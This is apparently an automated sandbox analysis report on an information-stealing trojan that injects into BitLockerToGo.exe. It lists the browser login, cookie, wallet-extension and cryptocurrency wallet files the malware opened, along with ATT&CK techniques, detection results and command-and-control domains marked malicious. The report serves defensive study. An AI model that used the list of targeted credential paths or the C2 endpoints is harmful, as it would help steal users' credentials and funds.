Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
Source: Yara match, File source: 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.2483917008.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2532039828.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.2483286988.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000003.2531513795.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: BitLockerToGo.exe PID: 7060, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match, File source: Process Memory Space: BitLockerToGo.exe PID: 7060, type: MEMORYSTR
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
Mitre Att&ck Matrix

Reconnaissance
• Gather Victim Identity Information
• Credentials
• Email Addresses
• Employee Names
• Gather Victim Network Information
• Domain Properties

Resource Development
• Acquire Infrastructure
• Domains
• DNS Server
• Virtual Private Server
• Server
• Botnet

Initial Access
• Valid Accounts
• Default Accounts
• Domain Accounts
• Local Accounts
• Cloud Accounts
• Replication Through Removable Media

Execution
• 1 Windows Management Instrumentation
• 2 Command and Scripting Interpreter
• 1 PowerShell
• Cron
• Launchd
• Scheduled Task

Persistence
• 1 DLL Side-Loading
• Boot or Logon Initialization Scripts
• Logon Script (Windows)
• Login Hook
• Network Logon Script
• RC Scripts

Privilege Escalation
• 311 Process Injection
• 1 DLL Side-Loading
• Logon Script (Windows)
• Login Hook
• Network Logon Script
• RC Scripts

Defense Evasion
• 1 Masquerading
• 11 Virtualization/Sandbox Evasion
• 311 Process Injection
• 11 Deobfuscate/Decode Files or Information
• 3 Obfuscated Files or Information
• 1 DLL Side-Loading

Credential Access
• 1 OS Credential Dumping
• LSASS Memory
• Security Account Manager
• NTDS
• LSA Secrets
• Cached Domain Credentials

Discovery
• 111 Security Software Discovery
• 11 Virtualization/Sandbox Evasion
• 1 Process Discovery
• 1 File and Directory Discovery
• 12 System Information Discovery
• Wi-Fi Discovery

Lateral Movement
• Remote Services
• Remote Desktop Protocol
• SMB/Windows Admin Shares
• Distributed Component Object Model
• SSH
• VNC

Collection
• 1 Screen Capture
• 1 Archive Collected Data
• 31 Data from Local System
• 2 Clipboard Data
• Keylogging
• GUI Input Capture

Command and Control
• 21 Encrypted Channel
• 2 Non-Application Layer Protocol
• 113 Application Layer Protocol
• Protocol Impersonation
• Fallback Channels
• Multiband Communication

Exfiltration
• Exfiltration Over Other Network Medium
• Exfiltration Over Bluetooth
• Automated Exfiltration
• Traffic Duplication
• Scheduled Transfer
• Data Transfer Size Limits

Impact
• Abuse Accessibility Features
• Network Denial of Service
• Data Encrypted for Impact
• Data Destruction
• Data Encrypted for Impact
• Service Stop
Source | Detection | Scanner | Label
file.exe | 34% | ReversingLabs | Win64.Dropper.WinGGo
file.exe | 38% | Virustotal |
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
shatterbreathepsw.shop | 17% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
shatterbreathepsw.shop | 104.21.95.19 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
shortsvelventysjo.shop | true | Virustotal 20%; Avira URL Cloud: safe | unknown
tolerateilusidjukl.shop | true | Virustotal 14%; Avira URL Cloud: safe | unknown
shatterbreathepsw.shop | true | Virustotal 17%; Avira URL Cloud: safe | unknown
demonstationfukewko.shop | true | Virustotal 21%; Avira URL Cloud: safe | unknown
productivelookewr.shop | true | Virustotal 16%; Avira URL Cloud: safe | unknown
alcojoldwograpciw.shop | true | Virustotal 21%; Avira URL Cloud: safe | unknown
incredibleextedwj.shop | true | Virustotal 14%; Avira URL Cloud: safe | unknown
liabilitynighstjsko.shop | true | Virustotal 17%; Avira URL Cloud: safe | unknown
https://shatterbreathepsw.shop/api | true | Virustotal 20%; Avira URL Cloud: malware | unknown
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://shatterbreathepsw.shop/y7BitLockerToGo.exe, 00000005.00000003.2398142344.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397680492.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397264679.0000000002F11000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://gallery.azure.com/https://graph.windows.net/mariadb.database.azure.comhttps://storage.azure.file.exefalse
                                      high
                                      http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comjson:file.exefalse
                                        high
                                        https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://ac.ecosia.org/autocomplete?q=BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://management.core.usgovcloudapi.net/https://dev.azuresynapse.usgovcloudapi.netbadfile.exefalse
                                                  high
                                                  https://shatterbreathepsw.shop/BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • 1%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://database.usgovcloudapi.net/unsupportedfile.exefalse
                                                    high
                                                    https://shatterbreathepsw.shop/apizenBitLockerToGo.exe, 00000005.00000003.2470610228.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419422712.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462610333.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://protobuf.dev/reference/go/faq#namespace-conflictLZMAfile.exefalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaBitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettinfile.exefalse
                                                          • 0%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://management.azure.com/https://managedhsm.azure.net/https://servicebus.azure.net/https://databfile.exefalse
                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.95.19 | shatterbreathepsw.shop | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1435406
Start date and time: 2024-05-02 17:03:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/0@1/1
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 53%
• Number of executed functions: 34
• Number of non-executed functions: 57
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 420 because there are no executed functions
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
17:04:22 | API Interceptor | 8x Sleep call for process: BitLockerToGo.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://gamma.app/docs/Untitled-9umekc4egyknsob | malicious | HTMLPhisher | 104.17.25.14
